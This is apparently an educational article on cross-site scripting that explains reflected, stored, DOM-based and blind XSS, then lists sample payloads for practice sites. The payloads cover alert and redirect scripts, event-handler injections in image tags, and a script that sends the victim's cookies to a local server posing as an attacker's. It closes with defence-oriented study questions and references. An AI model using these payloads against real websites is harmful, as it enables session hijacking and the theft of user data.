Cross-Site Scripting (XSS)

Introduction

Cross-site scripting (XSS) attacks involve injecting malicious scripts into trusted websites, exploiting flaws in web applications that don't validate or encode user input properly. Attackers can send malicious scripts, usually in the form of browser-side scripts, to unsuspecting users. The compromised script can access sensitive information like cookies or session tokens, leading to potential security breaches.

Types of XSS

1. Reflected XSS: The injected script is reflected off the web server, often in error messages or search results. Delivered to victims via links, forms, or other websites. Also known as Non-Persistent or Type-I XSS.
2. Stored XSS: The injected script is permanently stored on target servers like databases or message forums. The victim retrieves the script when requesting stored information. Also known as Persistent or Type-II XSS.
3. DOM-based XSS: Exploits Document Object Model (DOM) vulnerabilities. The attacker manipulates the Document Object Model through malicious scripts. Discussed separately due to its distinct nature.
4. Blind Cross-site Scripting: A persistent XSS where the attacker's payload is saved on the server and reflected to the victim from the backend application. Detection tools like XSS Hunter help confirm Blind Cross-site Scripting in real-world scenarios.

Non-Persistent or Type-I XSS or Reflected XSS

• It refers to an XSS attack where the injected script is reflected off the web server.
• It occurs in a single request/response cycle.
• The injected code is included in the dynamic content the web server sends back to the user as part of the response.
• Reflected XSS attacks are often delivered through malicious links, specially crafted forms, or directing users to a compromised website.
• The victim interacts with the malicious content, and the injected script is reflected to the user's browser, which executes the code as it appears to come from a "trusted" server.

Type-II XSS or Stored XSS

• It injects a malicious script permanently stored on the target servers.
• The injected code is typically saved in a database, message forum, visitor log, comment field, or similar storage locations.
• The victim retrieves the malicious script when requesting the stored information from the server.
• The injected code in Stored XSS persists over time, allowing an attacker to impact users who access the compromised data at a later point.
• This type of XSS can be more damaging as it has a prolonged effect and can affect multiple users over time.

XSS Attack Consequences

• Severity ranges from annoyance to complete account compromise.
• Can disclose session cookies, leading to session hijacking.
• Other consequences include file disclosure, Trojan horse installations, redirects, and content modification.

How to Identify Vulnerabilities

• Perform a security review of code to identify where user input enters HTML output.
• Tools like Nessus and Nikto can assist in scanning websites for vulnerabilities.

?XSS attacks occur when

• Data from an untrusted source enters a web application, often through web requests.
• Unvalidated data is included in dynamic content sent to the user's browser.

Malicious content, usually JavaScript, is injected and enables attackers

• Steal sensitive information like cookies or session tokens.
• Redirect victims to controlled content.
• Modify HTML content.

How to Perform the XSS Attack

Overview

• Purpose: Test for XSS vulnerabilities.
• Scope: Basic payloads with explanations.

Targets for Practice

• Any intentionally vulnerable test site
• Explicit permission is required for testing.
• Educational purposes only.

Example 1 – Injecting Tags

Enter <plaintext> in the search field.        

Example 2 – Reflected XSS

<script>alert('XSS')</script>        

Example 3 - Display the Cookies

<script>alert(document.cookie);</script>        

It is important to handle user data carefully and respect privacy and security considerations when accessing cookies, subject to the same-origin policy.

Example 4 – HTML Comment Tag XSS stored

Enter "<!---" in the Message field.        

Example 5 – Stored XSS via HTML Injection

<a >Hey, check out my site!</a>        

Example 6 – Concealing Script in Image Alt Attribute

<img src="insert the image address" alt=""onload="javascript:alert('XSS')">        

Example 7 – Automatic Redirect XSS stored

<script>window.location='https://www.google.com'</script>        

Example 8 – Redirect on Mouseover (Broken Image) XSS stored

<img src=x onMouseOver=window.location='https://www.google.com'>        

<img src="https://www.deepeddy.net/img/deepeddyfish.gif " alt=""<body onload="alert(String.fromCharCode (88,83,83))">        

<img src="https://www.deepeddy.net/img/deepeddyfish.gif" alt=""onload="alert('XSS')">        

<img src="https://www.deepeddy.net/img/deepeddyfish.gif" onMouseOver=window.location='https://www.google.com'>        

Hover over the broken image to trigger the redirect.

Example 9 – Redirect on Mouseover (Empty Space) XSS stored

• The script is used to create a space and redirect on mouseover.
• Hover over the seemingly empty message area for the redirect.?

<p id="demo" onmouseover="myFunction()"> &nbsp; </p> 
<script> function myFunction() 
{ 
document.getElementById("demo").innerHTML = "<img src=&nbsp; onMouseOver=window.location='https://www.google.com'>";
} 
</script>        

Example 10 – DOM-based Attack XSS is stored

?<button onclick = "alert('xss')"> submit </button>        

Example 11 – Capture the Victim Activity on the Attacker Server

Open the server

python3 -m http.server 1337        

Run the script

<script> window.location = ‘https://127.0.0.1:1337/?cookie=’ + document.cookie </script>        

Special Questions

What is the purpose of running python3 -m http.server 1337 in this scenario?

Explain the role of window.location in the provided script.

How does document.cookie retrieve the user's cookie information?

What does the URL https://127.0.0.1:1337/?cookie= represent in this context?

What happens when the script is executed on a webpage?

Why is it crucial for the attacker to open an HTTP server before running the script?

How could a user protect themselves from such attacks?

What potential risks does this script pose to user privacy and security?

In what ways can a web developer safeguard against such script-based attacks?

Explain the significance of the query parameter ?cookie= in the URL.

How does the <plaintext> tag exposes a vulnerability, and what security best practices should be implemented to prevent such issues?

Differentiate between reflected and stored XSS, providing real-world examples for each type from the scenarios.

Why is concealing a script within an image's alt attribute a security concern, and what measures can be taken to defend against such attacks?

Explain the technique employed to redirect mouseover with seeming space and discuss potential countermeasures to mitigate this attack.

Elaborate on DOM-based attacks and compare it with other XSS attack vectors.

How can security headers, such as Content Security Policy (CSP), be utilized to enhance web application security and mitigate XSS vulnerabilities?

Could you talk about the importance of input validation in preventing XSS attacks and provide examples of input validation techniques?

What role does client-side security play in preventing XSS, and how can JavaScript frameworks contribute to mitigating such vulnerabilities?

Could you explain the significance of the same-origin policy in the context of XSS attacks and how it helps prevent unauthorized data access?

Describe the role of browser extensions and plugins in XSS prevention and discuss potential risks associated with them.

Discuss the impact of XSS attacks on user privacy and data integrity, using examples from real-world incidents.

Evaluate the effectiveness of input validation mechanisms in preventing XSS attacks, considering scenarios where user input is dynamic and unpredictable.

How can the use of HTTP-only cookies contribute to the mitigation of XSS attacks, and what are the limitations of this approach?

Could you look into the impact of browser sandboxing on the prevention of XSS attacks and discuss any potential drawbacks or limitations?

In the context of XSS, discuss the challenges and considerations associated with securing legacy web applications.

Explore the potential risks associated with third-party content injection and the steps web developers can take to mitigate such risks.

Discuss the role of input validation in preventing DOM-based XSS attacks and provide examples of situations where traditional input validation may fall short.

Some Security Material

1. Srivastava, N., Sharma, H., Maliyal, A., Verma, M., & Sinha, K. (2024). Fortifying Data Security in the Evolving Digital Landscape. Handbook of Research on Innovative Approaches to Information Technology in Library and Information Science, 209–232. https://doi.org/10.4018/979-8-3693-0807-3.ch010
2. Karmakar, M., Priya, A., Sinha, K., & Verma, M. (2023). Shrinkable Cryptographic Technique Using Involutory Function for Image Encryption. Advanced Network Technologies and Intelligent Computing, 275–289. https://doi.org/10.1007/978-3-031-28183-9_20
3. Sinha, K., Paul, P., & Amritanjali, A. (2022). An Improved Pseudorandom Sequence Generator and its Application to Image Encryption. KSII Transactions on Internet and Information Systems, 16(4). https://doi.org/10.3837/tiis.2022.04.012
4. Sinha, K., Paul, P., & Amritanjali, A. (2021). Randomized Block Size (RBS) Model for Secure Data Storage in Distributed Server. KSII Transactions on Internet and Information Systems, 15(12). https://doi.org/10.3837/tiis.2021.12.014
5. Sinha, K., Priya, A., & Paul, P. (2020). K-RSA: Secure data storage technique for multimedia in cloud data server. Journal of Intelligent &amp; Fuzzy Systems, 39(3), 3297–3314. https://doi.org/10.3233/jifs-191687